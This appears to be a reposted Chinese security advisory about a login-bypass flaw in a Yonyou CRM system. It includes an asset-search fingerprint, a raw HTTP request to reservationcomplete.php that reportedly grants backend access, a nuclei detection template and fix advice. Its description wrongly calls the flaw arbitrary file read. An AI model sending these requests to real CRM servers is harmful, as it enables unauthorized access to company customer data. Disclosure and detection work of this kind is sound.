用友crm客户关系管理的第一需求就是对客户信息的集中管理和共享利用,即客户资源的企业化管理,避免因业务调整或人员变动造成的客户资源流失和客户管理盲区的产生;更重要是可以通过完善的客户信息来支持不同业务角色面向客户的工作,实现客户信息在企业内部充分共享利用,提高面向客户的工作有效性和效率,从而全面提升客户的满意度
免责声明
文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责
漏洞描述
某友CRM系统是一款综合性的客户关系管理软件,旨在帮助企业建立和维护与客户之间的良好关系。它提供了全面的功能,包括销售管理、市场营销、客户服务和分析报告等。该系统支持多种行业和企业规模,并具有灵活可定制的特点,可以根据企业的需求进行个性化配置。该CRM系统软件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件。
-
鹰图
-
app.name="X友 CRM"
GET /background/reservationcomplete.php?ID=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
访问后,直接访问主页,即可绕过登录至后台
nuclei
id: yongyouU8_CRM-reservationcomplete
info:
name: X友CRM系统存在逻辑漏洞直接登录后台
author: wy876
severity: high
http:
- raw:
- |
GET /background/reservationcomplete.php?ID=1 HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
- |
GET / HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
matchers:
- type: dsl
dsl:
- 'contains(body_2,""msg": "bgsesstimeout-", "serverName"")'
修复建议
-
检查用户输入:在处理用户输入时,应该对输入进行严格的验证和过滤,避免让恶意输入通过应用程序。
-
配置文件权限:在服务器上设置文件和目录的权限,确保只有授权的用户才能够读取敏感的文件。
-
使用白名单:为了防止攻击者尝试读取任意文件,可以使用白名单机制来限制应用程序可以访问的文件列表。
公众号技术文章仅供诸位网络安全工程师对自己所管辖的网站、服务器、网络进行检测或维护时参考用,公众号的检测工具仅供各大安全公司的安全测试员安全测试使用。未经允许请勿利用文章里的技术资料对任何外部计算机系统进行入侵攻击,公众号的各类工具均不得用于任何非授权形式的安全测试。公众号仅提供技术交流,不对任何成员利用技术文章或者检测工具造成任何理论上的或实际上的损失承担责任。
加微信进群获取更多资源:
![]()
原文始发于微信公众号(TKing的安全圈):X友CRM系统存在逻辑漏洞直接登录后台
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论